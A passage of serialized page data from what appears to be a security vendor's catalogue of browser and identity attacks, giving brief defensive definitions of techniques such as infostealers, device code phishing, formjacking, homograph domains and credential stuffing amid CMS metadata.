scraping",1790176098363,{"title":18253,"name":18253,"url":18256,"blocks":18257,"state":18263},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fpassword-scraping",[18258],{"id":18259,"@type":44,"tagName":73,"properties":18260,"responsiveStyles":18261},"builder-pixel-bg2zbt00yk",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18262},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18264},{"path":21,"query":18265},{},{"kind":20},1790176098340,[],1790176799597,"79s4sn46b7j","Infostealers are malware designed to extract credentials, session cookies, browser autofill data, and cryptocurrency wallets from infected devices. Delivered via phishing, malvertising, fake software downloads, and trojanized installers. The stolen data (known as \"logs\") is sold on dark web marketplaces and used for account takeover, session hijacking, and credential stuffing at scale. ClickFix is the most common delivery method for infostealer malware today, followed by malicious file downloads.","Also known as: stealer malware \u002F credential stealers \u002F info-stealing trojans","regular:faDatabase",{"deviceSize":83,"location":18275},{"path":21,"query":18276},{},"0eac933b295443c9bb6120cb1c31ff28",1790585507304,{"kind":20},1790177827565,[],{"createdDate":18283,"data":18284,"id":18316,"lastUpdated":18317,"meta":18318,"modelId":17142,"name":18315,"published":13,"firstPublished":18319,"query":18320,"rev":17145},1790177702019,{"attackTechniques":18285,"browserIdentityAttacksMatrix":18295,"description":18310,"icon":18311,"state":18312,"title":18315,"visibleOnPage":19},[18286],{"attacks":18287},{"@type":105,"id":611,"model":452,"value":18288},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18289,"data":18290,"variations":18291,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18292,"meta":18293,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18294,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[18296],{"tag":18297},{"@type":105,"id":17296,"model":17052,"value":18298},{"name":17298,"createdDate":17299,"modelId":17056,"data":18299,"meta":18308,"lastUpdated":17312,"id":17296,"query":18309,"published":13,"firstPublished":17314,"rev":17315},{"title":17298,"name":17298,"url":17301,"blocks":18300,"state":18305},[18301],{"id":17304,"@type":44,"tagName":73,"properties":18302,"responsiveStyles":18303},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18304},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18306},{"path":21,"query":18307},{},{"kind":20},[],"In-app phishing is a phishing attack delivered through legitimate SaaS application features — issue comments, tickets, document sharing notifications, calendar invites, and similar. Attackers abuse native collaboration features to deliver malicious links from within trusted platforms. The phishing link may still arrive by email, but the email itself is legitimate — sent from the app's real domain — so it passes reputation and authentication checks.","regular:faGrid2",{"deviceSize":83,"location":18313},{"path":21,"query":18314},{},"In-app phishing","c7b3e65e1c1049439ccb73e5d5975add",1790585506508,{"kind":20},1790177827572,[],{"createdDate":18322,"data":18323,"id":18377,"lastUpdated":18378,"meta":18379,"modelId":17142,"name":18376,"published":13,"firstPublished":18380,"query":18381,"rev":17145},1790177701571,{"attackTechniques":18324,"browserIdentityAttacksMatrix":18334,"description":18371,"icon":18372,"state":18373,"title":18376,"visibleOnPage":19},[18325],{"attacks":18326},{"@type":105,"id":611,"model":452,"value":18327},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18328,"data":18329,"variations":18330,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18331,"meta":18332,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18333,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[18335,18349],{"tag":18336},{"@type":105,"id":17631,"model":17052,"value":18337},{"name":17633,"createdDate":17634,"modelId":17056,"data":18338,"meta":18347,"lastUpdated":17647,"id":17631,"query":18348,"published":13,"firstPublished":17649,"rev":17650},{"title":17633,"name":17633,"url":17636,"blocks":18339,"state":18344},[18340],{"id":17639,"@type":44,"tagName":73,"properties":18341,"responsiveStyles":18342},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18343},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18345},{"path":21,"query":18346},{},{"kind":20},[],{"tag":18350},{"@type":105,"id":18351,"model":17052,"value":18352},"d48ec92fa03a41029c3e37cb7fa74361",{"name":18353,"createdDate":18354,"modelId":17056,"data":18355,"meta":18366,"lastUpdated":18367,"id":18351,"query":18368,"published":13,"firstPublished":18369,"rev":18370},"SAT1019 \u002F IM user spoofing",1790176093268,{"title":18353,"name":18353,"url":18356,"blocks":18357,"state":18363},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fim-user-spoofing",[18358],{"id":18359,"@type":44,"tagName":73,"properties":18360,"responsiveStyles":18361},"builder-pixel-yzpxjd3k0gl",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18362},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18364},{"path":21,"query":18365},{},{"kind":20},1790176093242,[],1790176799671,"vnna64fe8l","IM phishing is a phishing attack delivered through instant messaging platforms via direct messages, group channels, or external guest access. Often more effective than email phishing because users trust messages from colleagues and the informal context lowers suspicion. Platforms with external messaging or guest access features are particularly exposed.","regular:faComment",{"deviceSize":83,"location":18374},{"path":21,"query":18375},{},"IM phishing (Slack, Teams, WhatsApp)","2602b4f2839e4d7c9d31f36f4761a774",1790585505603,{"kind":20},1790177827579,[],{"createdDate":18383,"data":18384,"id":18401,"lastUpdated":18402,"meta":18403,"modelId":17142,"name":18400,"published":13,"firstPublished":18404,"query":18405,"rev":17145},1790177701083,{"attackTechniques":18385,"description":18395,"icon":18396,"state":18397,"title":18400,"visibleOnPage":19},[18386],{"attacks":18387},{"@type":105,"id":611,"model":452,"value":18388},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18389,"data":18390,"variations":18391,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18392,"meta":18393,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18394,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Homograph (or homoglyph) attacks are a domain spoofing technique that uses characters from non-Latin alphabets (typically Cyrillic) that are visually identical to Latin characters. The domain looks legitimate in the address bar but resolves to an attacker-controlled server, often with a valid SSL certificate and padlock icon. Unlike typosquatting, there is nothing visually wrong for a human to catch.","regular:faFont",{"deviceSize":83,"location":18398},{"path":21,"query":18399},{},"Homograph \u002F homoglyph attacks (IDN spoofing)","a628533c39f8482f84d4fbca4f0cd6f3",1790585504585,{"kind":20},1790177827585,[],{"createdDate":18407,"data":18408,"id":18415,"lastUpdated":18416,"meta":18417,"modelId":17142,"name":18414,"published":13,"firstPublished":18418,"query":18419,"rev":17145},1790177700558,{"description":18409,"icon":18410,"state":18411,"title":18414,"visibleOnPage":19},"Help desk phishing (or help desk social engineering) is an attack where a threat actor contacts an organization's IT help desk impersonating an employee to reset credentials, enroll a new MFA device, or gain access to accounts. The attacker typically has enough personal information to pass identity verification. Once they have a fresh password or MFA token, the actual compromise happens in the browser — logging into the victim's SaaS apps, email, or VPN portal.","regular:faHeadset",{"deviceSize":83,"location":18412},{"path":21,"query":18413},{},"Help desk phishing \u002F social engineering","b8d5d532160e4a6dab278e6fc296d708",1790585503708,{"kind":20},1790177827591,[],{"createdDate":18421,"data":18422,"id":18463,"lastUpdated":18464,"meta":18465,"modelId":17142,"name":289,"published":13,"firstPublished":18466,"query":18467,"rev":17145},1790177700142,{"attackTechniques":18423,"browserIdentityAttacksMatrix":18434,"description":18457,"hint":18458,"icon":18459,"state":18460,"title":289,"visibleOnPage":19},[18424],{"attacks":18425},{"@type":105,"id":527,"model":452,"value":18426},{"createdDate":529,"id":527,"name":289,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18427,"data":18428,"variations":18429,"lastUpdated":533,"firstPublished":534,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18430,"meta":18431,"rev":18433},[],{"name":289,"url":291},{},[],{"breakpoints":18432,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"opo3r1csicm",[18435],{"tag":18436},{"@type":105,"id":18437,"model":17052,"value":18438},"115d3c27c86f432c96ccaf09bbd36a5b",{"name":18439,"createdDate":18440,"modelId":17056,"data":18441,"meta":18452,"lastUpdated":18453,"id":18437,"query":18454,"published":13,"firstPublished":18455,"rev":18456},"SAT1017 \u002F Ghost logins",1790176090821,{"title":18439,"name":18439,"url":18442,"blocks":18443,"state":18449},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fghost-logins",[18444],{"id":18445,"@type":44,"tagName":73,"properties":18446,"responsiveStyles":18447},"builder-pixel-z3eujwxif4",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18448},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18450},{"path":21,"query":18451},{},{"kind":20},1790176090799,[],1790176799697,"xs28a3tgwn","Ghost logins are hidden login paths that persist after SSO access is revoked — local accounts, saved passwords, or direct-URL logins that bypass the IdP entirely. Attackers (or former employees) can access SaaS apps long after their SSO session is terminated because the underlying local account was never deactivated.","Also known as: shadow access \u002F SSO bypass \u002F orphaned accounts","regular:faGhost",{"deviceSize":83,"location":18461},{"path":21,"query":18462},{},"091bdd0baf6e4737b646cf04fef6fc2b",1790585502495,{"kind":20},1790177827597,[],{"createdDate":18469,"data":18470,"id":18478,"lastUpdated":18479,"meta":18480,"modelId":17142,"name":18477,"published":13,"firstPublished":18481,"query":18482,"rev":17145},1790177699682,{"description":18471,"hint":18472,"icon":18473,"state":18474,"title":18477,"visibleOnPage":19},"Formjacking, or web skimming, uses malicious JavaScript injected into payment pages of e-commerce sites to capture credit card details as customers type them. Operates in real time within the browser, making it invisible to server-side security. A specific payload type found on compromised websites.","Also known as: card skimming \u002F digital skimming \u002F e-skimming","regular:faCreditCard",{"deviceSize":83,"location":18475},{"path":21,"query":18476},{},"Formjacking \u002F web skimming (Magecart)","0a7f4cb26c60436a967babe26a1fb9a9",1790585501738,{"kind":20},1790177827604,[],{"createdDate":18484,"data":18485,"id":18502,"lastUpdated":18503,"meta":18504,"modelId":17142,"name":18501,"published":13,"firstPublished":18505,"query":18506,"rev":17145},1790177699199,{"attackTechniques":18486,"description":18496,"icon":18497,"state":18498,"title":18501,"visibleOnPage":19},[18487],{"attacks":18488},{"@type":105,"id":569,"model":452,"value":18489},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":18490,"stageModifiedSincePublish":6,"query":18492,"data":18493,"variations":18494,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18495,"rev":17427},{"breakpoints":18491,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],"A fake browser update is a social engineering attack that injects a \"your browser is out of date\" banner into compromised legitimate websites. Users who click the \"update\" button download malware instead. Often serves as an initial access vector for ransomware.","regular:faArrowsRotate",{"deviceSize":83,"location":18499},{"path":21,"query":18500},{},"Fake browser updates","7ce6ddc9e344458f95c4b1f2d9dca69d",1790585500824,{"kind":20},1790177827619,[],{"createdDate":18508,"data":18509,"id":18526,"lastUpdated":18527,"meta":18528,"modelId":17142,"name":18525,"published":13,"firstPublished":18529,"query":18530,"rev":17145},1790177698803,{"attackTechniques":18510,"description":18520,"icon":18521,"state":18522,"title":18525,"visibleOnPage":19},[18511],{"attacks":18512},{"@type":105,"id":611,"model":452,"value":18513},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18514,"data":18515,"variations":18516,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18517,"meta":18518,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18519,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Evil twin Wi-Fi attacks use a rogue Wi-Fi access point that impersonates a legitimate network (same SSID, sometimes same password). The credential theft happens in the browser: modern attacks deploy a captive portal that mimics a familiar login screen, and the victim enters credentials thinking they're authenticating to the network. Can also intercept unencrypted traffic or man-in-the-middle browser sessions.","regular:faWifi",{"deviceSize":83,"location":18523},{"path":21,"query":18524},{},"Evil twin Wi-Fi","34d2047b3eb1401883eef80077fe4efd",1790585499904,{"kind":20},1790177827627,[],{"createdDate":18532,"data":18533,"id":18565,"lastUpdated":18566,"meta":18567,"modelId":17142,"name":18564,"published":13,"firstPublished":18568,"query":18569,"rev":17145},1790177698402,{"attackTechniques":18534,"browserIdentityAttacksMatrix":18544,"description":18559,"icon":18560,"state":18561,"title":18564,"visibleOnPage":19},[18535],{"attacks":18536},{"@type":105,"id":611,"model":452,"value":18537},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18538,"data":18539,"variations":18540,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18541,"meta":18542,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18543,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[18545],{"tag":18546},{"@type":105,"id":17051,"model":17052,"value":18547},{"name":17054,"createdDate":17055,"modelId":17056,"data":18548,"meta":18557,"lastUpdated":17069,"id":17051,"query":18558,"published":13,"firstPublished":17071,"rev":17072},{"title":17054,"name":17054,"url":17058,"blocks":18549,"state":18554},[18550],{"id":17061,"@type":44,"tagName":73,"properties":18551,"responsiveStyles":18552},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18553},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18555},{"path":21,"query":18556},{},{"kind":20},[],"Email phishing is a phishing attack delivered via email — the most common initial access vector. Includes credential harvesting pages linked from spoofed emails, business email compromise (BEC), and spear phishing targeting specific individuals. Increasingly enhanced by AI-generated content that eliminates traditional tell-tale signs like grammatical errors.","regular:faEnvelope",{"deviceSize":83,"location":18562},{"path":21,"query":18563},{},"Email phishing","d5353e74d6374fb09e68e316bf1c9d2a",1790585499088,{"kind":20},1790177827632,[],{"createdDate":18571,"data":18572,"id":18589,"lastUpdated":18590,"meta":18591,"modelId":17142,"name":18588,"published":13,"firstPublished":18592,"query":18593,"rev":17145},1790177698012,{"attackTechniques":18573,"description":18583,"icon":18584,"state":18585,"title":18588,"visibleOnPage":19},[18574],{"attacks":18575},{"@type":105,"id":569,"model":452,"value":18576},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":18577,"stageModifiedSincePublish":6,"query":18579,"data":18580,"variations":18581,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18582,"rev":17427},{"breakpoints":18578,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],"Drive-by downloads deliver malware when a user visits a compromised or malicious website. Classic drive-bys exploited browser or plugin vulnerabilities to download silently without any user interaction, but modern browser sandboxing has made truly zero-interaction exploits rare. Most contemporary variants require minimal interaction — clicking a fake update prompt, approving a download, or running an installer. Often delivered through malvertising, compromised legitimate sites, or exploit kits.","regular:faDownload",{"deviceSize":83,"location":18586},{"path":21,"query":18587},{},"Drive-by downloads","9a4f14c927c54e23bcc40cce9ec18f0f",1790585498207,{"kind":20},1790177827638,[],{"createdDate":18595,"data":18596,"id":18613,"lastUpdated":18614,"meta":18615,"modelId":17142,"name":18612,"published":13,"firstPublished":18616,"query":18617,"rev":17145},1790177697619,{"attackTechniques":18597,"description":18607,"icon":18608,"state":18609,"title":18612,"visibleOnPage":19},[18598],{"attacks":18599},{"@type":105,"id":611,"model":452,"value":18600},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18601,"data":18602,"variations":18603,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18604,"meta":18605,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18606,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"DNS hijacking (or DNS spoofing) is the manipulation of DNS resolution to redirect users from legitimate sites to attacker-controlled destinations. Methods include compromising DNS servers, poisoning DNS caches, modifying router DNS settings, or intercepting DNS queries. The browser shows the correct URL in the address bar, making the redirect invisible to users. Often used with phishing pages or credential harvesting.","regular:faNetworkWired",{"deviceSize":83,"location":18610},{"path":21,"query":18611},{},"DNS hijacking \u002F DNS spoofing","317ed608b1bc466e9a0ef783120fae93",1790585497319,{"kind":20},1790177827644,[],{"createdDate":18619,"data":18620,"id":18661,"lastUpdated":18662,"meta":18663,"modelId":17142,"name":260,"published":13,"firstPublished":18664,"query":18665,"rev":17145},1790177697189,{"attackTechniques":18621,"browserIdentityAttacksMatrix":18632,"description":18655,"hint":18656,"icon":18657,"state":18658,"title":260,"visibleOnPage":19},[18622],{"attacks":18623},{"@type":105,"id":513,"model":452,"value":18624},{"createdDate":515,"id":513,"name":260,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18625,"data":18626,"variations":18627,"lastUpdated":519,"firstPublished":520,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18628,"meta":18629,"rev":18631},[],{"name":260,"url":262},{},[],{"breakpoints":18630,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"aqjrlrulpfv",[18633],{"tag":18634},{"@type":105,"id":18635,"model":17052,"value":18636},"538d85afe4f545ebb4a4a32de83c6499",{"name":18637,"createdDate":18638,"modelId":17056,"data":18639,"meta":18650,"lastUpdated":18651,"id":18635,"query":18652,"published":13,"firstPublished":18653,"rev":18654},"SAT1012 \u002F Device code phishing",1790176087433,{"title":18637,"name":18637,"url":18640,"blocks":18641,"state":18647},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fdevice-code-phishing",[18642],{"id":18643,"@type":44,"tagName":73,"properties":18644,"responsiveStyles":18645},"builder-pixel-mp6ptzrfms",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18646},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18648},{"path":21,"query":18649},{},{"kind":20},1790176087411,[],1790176799731,"d13mdovcl9j","Device code phishing is a phishing technique that abuses OAuth 2.0 device authorization flows. The attacker initiates a device code request and tricks the victim into entering the code on a legitimate Microsoft (or other IdP) login page. Because the victim authenticates on the real IdP domain, MFA and passkeys don't help — the attacker receives the resulting tokens. Distinct from AiTM (no proxy involved) and consent phishing (abuses device flow, not app consent).","Also known as: device authorization grant abuse \u002F device flow phishing","regular:faLaptopMobile",{"deviceSize":83,"location":18659},{"path":21,"query":18660},{},"93673708ec3e4233b89222278ad01a12",1790585496540,{"kind":20},1790177827651,[],{"createdDate":18667,"data":18668,"id":18694,"lastUpdated":18695,"meta":18696,"modelId":17142,"name":18693,"published":13,"firstPublished":18697,"query":18698,"rev":17145},1790177696783,{"attackTechniques":18669,"description":18688,"icon":18689,"state":18690,"title":18693,"visibleOnPage":19},[18670,18679],{"attacks":18671},{"@type":105,"id":611,"model":452,"value":18672},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18673,"data":18674,"variations":18675,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18676,"meta":18677,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18678,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":18680},{"@type":105,"id":468,"model":452,"value":18681},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18682,"data":18683,"variations":18684,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18685,"meta":18686,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":18687,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Deepfake video and voice scams use AI-generated video and voice cloning in real-time calls to impersonate executives and authorize fraudulent transactions. Attackers clone voices from short audio samples and generate synthetic video that matches lip movements to speech in real time. The calls increasingly happen through browser-based meeting platforms. Often used as a lure to deliver browser-based payloads like phishing and ClickFix.","regular:faVideo",{"deviceSize":83,"location":18691},{"path":21,"query":18692},{},"Deepfake video\u002Fvoice scams","a2482548426a4b45bcee8001259f2488",1790585495729,{"kind":20},1790177827657,[],{"createdDate":18700,"data":18701,"id":18724,"lastUpdated":18725,"meta":18726,"modelId":17142,"name":18723,"published":13,"firstPublished":18727,"query":18728,"rev":17145},1790177696246,{"browserIdentityAttacksMatrix":18702,"description":18717,"hint":18718,"icon":18719,"state":18720,"title":18723,"visibleOnPage":19},[18703],{"tag":18704},{"@type":105,"id":17200,"model":17052,"value":18705},{"name":17202,"createdDate":17203,"modelId":17056,"data":18706,"meta":18715,"lastUpdated":17216,"id":17200,"query":18716,"published":13,"firstPublished":17218,"rev":17219},{"title":17202,"name":17202,"url":17205,"blocks":18707,"state":18712},[18708],{"id":17208,"@type":44,"tagName":73,"properties":18709,"responsiveStyles":18710},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18711},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18713},{"path":21,"query":18714},{},{"kind":20},[],"Cross-IdP impersonation is an attack where a threat actor exploits trust relationships between identity providers to impersonate users across federated environments. The attacker compromises or creates an account in one IdP and leverages federation trust to gain access to resources in another IdP's domain. Exploits the implicit trust that federated environments place in assertions from partner identity providers.","Also known as: identity provider impersonation \u002F federation impersonation","regular:faShuffle",{"deviceSize":83,"location":18721},{"path":21,"query":18722},{},"Cross-IdP impersonation","dd6b14f874d1424f96090b4e9b9847b7",1790585494886,{"kind":20},1790177827662,[],{"createdDate":18730,"data":18731,"id":18771,"lastUpdated":18772,"meta":18773,"modelId":17142,"name":299,"published":13,"firstPublished":18774,"query":18775,"rev":17145},1790177695709,{"attackTechniques":18732,"browserIdentityAttacksMatrix":18742,"description":18765,"hint":18766,"icon":18767,"state":18768,"title":299,"visibleOnPage":19},[18733],{"attacks":18734},{"@type":105,"id":499,"model":452,"value":18735},{"createdDate":501,"id":499,"name":299,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18736,"data":18737,"variations":18738,"lastUpdated":505,"firstPublished":506,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18739,"meta":18740,"rev":17716},[],{"name":299,"url":301},{},[],{"breakpoints":18741,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[18743],{"tag":18744},{"@type":105,"id":18745,"model":17052,"value":18746},"96e4dcd0baf9482985d8af4615d6a760",{"name":18747,"createdDate":18748,"modelId":17056,"data":18749,"meta":18760,"lastUpdated":18761,"id":18745,"query":18762,"published":13,"firstPublished":18763,"rev":18764},"SAT1011 \u002F Credential stuffing",1790176086626,{"title":18747,"name":18747,"url":18750,"blocks":18751,"state":18757},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fcredential-stuffing",[18752],{"id":18753,"@type":44,"tagName":73,"properties":18754,"responsiveStyles":18755},"builder-pixel-gblhylsi26f",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18756},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18758},{"path":21,"query":18759},{},{"kind":20},1790176086602,[],1790176799741,"svkvrt12lc","Credential stuffing is an automated attack that tests stolen username\u002Fpassword pairs (from data breaches) against multiple login pages. Exploits password reuse. Distinct from brute force (which guesses passwords) and password spraying (which tests common passwords across many accounts).","Also known as: credential reuse attacks \u002F breach replay","regular:faKeySkeleton",{"deviceSize":83,"location":18769},{"path":21,"query":18770},{},"c5829f7fdb7f42dfa9603e13b069e209",1790585493985,{"kind":20},1790177827667,[],{"createdDate":18777,"data":18778,"id":18804,"lastUpdated":18805,"meta":18806,"modelId":17142,"name":11466,"published":13,"firstPublished":18807,"query":18808,"rev":17145},1790177695208,{"attackTechniques":18779,"description":18798,"hint":18799,"icon":18800,"state":18801,"title":11466,"visibleOnPage":19},[18780,18789],{"attacks":18781},{"@type":105,"id":611,"model":452,"value":18782},{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18783,"data":18784,"variations":18785,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18786,"meta":18787,"rev":17047},[],{"name":245,"url":247},{},[],{"breakpoints":18788,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":18790},{"@type":105,"id":451,"model":452,"value":18791},{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18792,"data":18793,"variations":18794,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":18795,"lastUpdateSource":60,"meta":18796,"rev":17604},[],{"name":455,"url":252},{},[],{"breakpoints":18797,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Credential phishing is a phishing attack specifically designed to steal usernames and passwords by presenting a fake login page that mimics a legitimate service. The most common form of phishing — the attacker clones a login page, hosts it on a lookalike or compromised domain, and directs victims to it via email, IM, or other channels. Modern credential phishing often uses AiTM reverse proxies to capture session tokens alongside credentials, bypassing MFA.","Also known as: login page phishing \u002F credential harvesting \u002F password phishing","regular:faArrowRightToBracket",{"deviceSize":83,"location":18802},{"path":21,"query":18803},{},"4d85c14d8bdf4ffa9421c15bddab5e51",1790585493090,{"kind":20},1790177827673,[],{"createdDate":18810,"data":18811,"id":18827,"lastUpdated":18828,"meta":18829,"modelId":17142,"name":4773,"published":13,"firstPublished":18830,"query":18831,"rev":17145},1790177694810,{"attackTechniques":18812,"description":18822,"icon":18823,"state":18824,"title":4773,"visibleOnPage":19},[18813],{"attacks":18814},{"@type":105,"id":468,"model":452,"value":18815},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18816,"data":18817,"variations":18818,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18819,"meta":18820,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":18821,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"CrashFix is a ClickFix variant that mimics application crash reports or system error dialogs. The user is prompted to run a \"diagnostic\" or \"repair\" command that executes malicious code.","regular:faTriangleExclamation",{"deviceSize":83,"location":18825},{"path":21,"query":18826},{},"5f60a44675d7480a9180794cabce94ba",1790585491697,{"kind":20},1790177827677,[],{"createdDate":18833,"data":18834,"id":18905,"lastUpdated":18906,"meta":18907,"modelId":17142,"name":1378,"published":13,"firstPublished":18908,"query":18909,"rev":17145},1790177694361,{"attackTechniques":18835,"browserIdentityAttacksMatrix":18855,"description":18900,"icon":18901,"state":18902,"title":1378,"visibleOnPage":19},[18836,18845],{"attacks":18837},{"@type":105,"id":468,"model":452,"value":18838},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18839,"data":18840,"variations":18841,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18842,"meta":18843,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":18844,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":18846},{"@type":105,"id":485,"model":452,"value":18847},{"createdDate":487,"id":485,"name":265,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18848,"data":18849,"variations":18850,"lastUpdated":491,"firstPublished":492,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18851,"meta":18852,"rev":18854},[],{"name":265,"url":267},{},[],{"breakpoints":18853,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"g7pimi8lk38",[18856,18878],{"tag":18857},{"@type":105,"id":18858,"model":17052,"value":18859},"cc83345fbdb745a190f76ab6658495f6",{"name":18860,"createdDate":18861,"modelId":17056,"data":18862,"meta":18873,"lastUpdated":1887